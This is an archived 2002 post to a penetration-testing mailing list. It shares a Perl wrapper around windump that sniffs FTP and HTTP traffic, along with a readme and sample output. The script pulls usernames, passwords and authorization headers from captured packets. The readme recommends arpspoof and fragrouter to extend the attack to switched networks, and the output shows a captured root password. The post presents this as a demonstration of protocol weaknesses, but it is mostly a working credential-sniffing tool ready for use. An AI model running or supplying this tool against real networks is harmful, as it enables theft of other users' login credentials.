Perl Script wrapper for Windump
From: Susan Chan Lee (susan.lee@securityassoc.com)Date: 03/01/02
- Previous message: Skip Hans Stellhorn: "iis server strings vs. patch level"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Thu, 28 Feb 16:36:05 2002 +0000 From: "Susan Chan Lee" <susan.lee@securityassoc.com> To: pen-test@securityfocus.com
Hi
Just thought, this Perl script may be useful to you all.
This script is essentially a wrapper around windump and demonstrates
the weaknesses of the FTP and HTTP protocols. It will cleanly capture
and display all FTP and HTTP usernames and passwords and has been
configured for Proxy support (port 8080 and 8088 - modify script for
your specific requirements). It is most effective on hubbed networks.
To use on switched networks use arpspoof and fragrouter or something
similar for best results.
Thanks
Susan Chan Lee
Security Associates - Singapore
#!/usr/bin/perl
# Author: Susan Lee
# email: susan.lee@securityassoc.com
# File: sort.pl
# Usage: perl sort.pl
$LIMIT = shift || 25000;
$|=1;
open (STDIN,"windump -lnx -s 1024 dst port 80 or 8080 or 8088 or 21
|");
while (<>) {
if (/^\S/) {
last unless $LIMIT--;
while
($packet=~/(USER|PASS|GET|POST|WWW-Authenticate|Authorization).+/g)
{
print "$client -> $host\t$&\n";
}
undef $client; undef $host; undef $packet;
($client,$host) = /(\d+\.\d+\.\d+\.\d+).+ > (\d+\.\d+\.\d+\.\d+)/
if /P \d+:\d+\((\d+)\)/ && $1 > 0;
}
next unless $client && $host;
s/\s+//;
s/([0-9a-f]{2})\s?/chr(hex($1))/eg;
tr/\x1F-\x7E\r\n//cd;
$packet .= $_;
}
# End of Script
Readme File:
Tested successfully using ActiveState Perl
(http://www.activestate.com).
This script is essentially a wrapper around windump and demonstrates
the weaknesses of the FTP and HTTP protocols. It will cleanly capture
and display all FTP and HTTP usernames and passwords and has been
configured for Proxy support (port 8080 and 8088 - modify script for
your specific requirements). It is most effective on hubbed networks.
To use on switched networks use arpspoof and fragrouter or something
similar for
best results.
Sort.pl builds on a script written by Lincoln Stein. This script is a
port to Windows and makes some other modifications.
This script is really a wrap around the Windump program, which needs
to installed and configured on your system for this script to work
(http://netgroup-serv.polito.it/windump/) sort.pl assumes windump is
in your system path. If your system has multiple interfaces
(including dial-up interfaces), then you’ll need to tell windump
which interface to listen on via the –i X command, where X in
the number of the interface and edit the script appropriately (line
8). Use the windump –D command to see all interfaces on your system.
An example is given below:
C:\Temp\ps>perl sort.pl
windump: listening
on\Device\Packet_{1443C46F-E2B6-404F-9588-BB555B2E3764}
172.1.3.130 -> 172.1.4.231 USER root
172.1.3.130 -> 172.1.4.231 PASS london
172.1.3.130 -> 10.168.13.1 GET
http://packetstormsecurity.nl/images/ps.gif HTTP/1.1
172.1.3.130 -> 10.168.13.1 GET
http://packetstormsecurity.nl/images/spacer.gif HTTP/1.1
172.1.3.130 -> 10.168.13.1 GET
http://packetstormsecurity.nl/images/go.gif HTTP/1.1
172.1.3.130 -> 10.168.13.1 GET
http://packetstormsecurity.nl/images/search.gif HTTP/1.1
172.1.3.130 -> 10.168.13.1 GET
http://packetstormsecurity.nl/images/bg_area2.gif HTTP/1.1
172.1.3.130 -> 10.168.13.1 GET
http://packetstormsecurity.nl/images/top.gif HTTP/1.1
493 packets received by filter
0 packets dropped by kernel
----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/
- Previous message: Skip Hans Stellhorn: "iis server strings vs. patch level"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
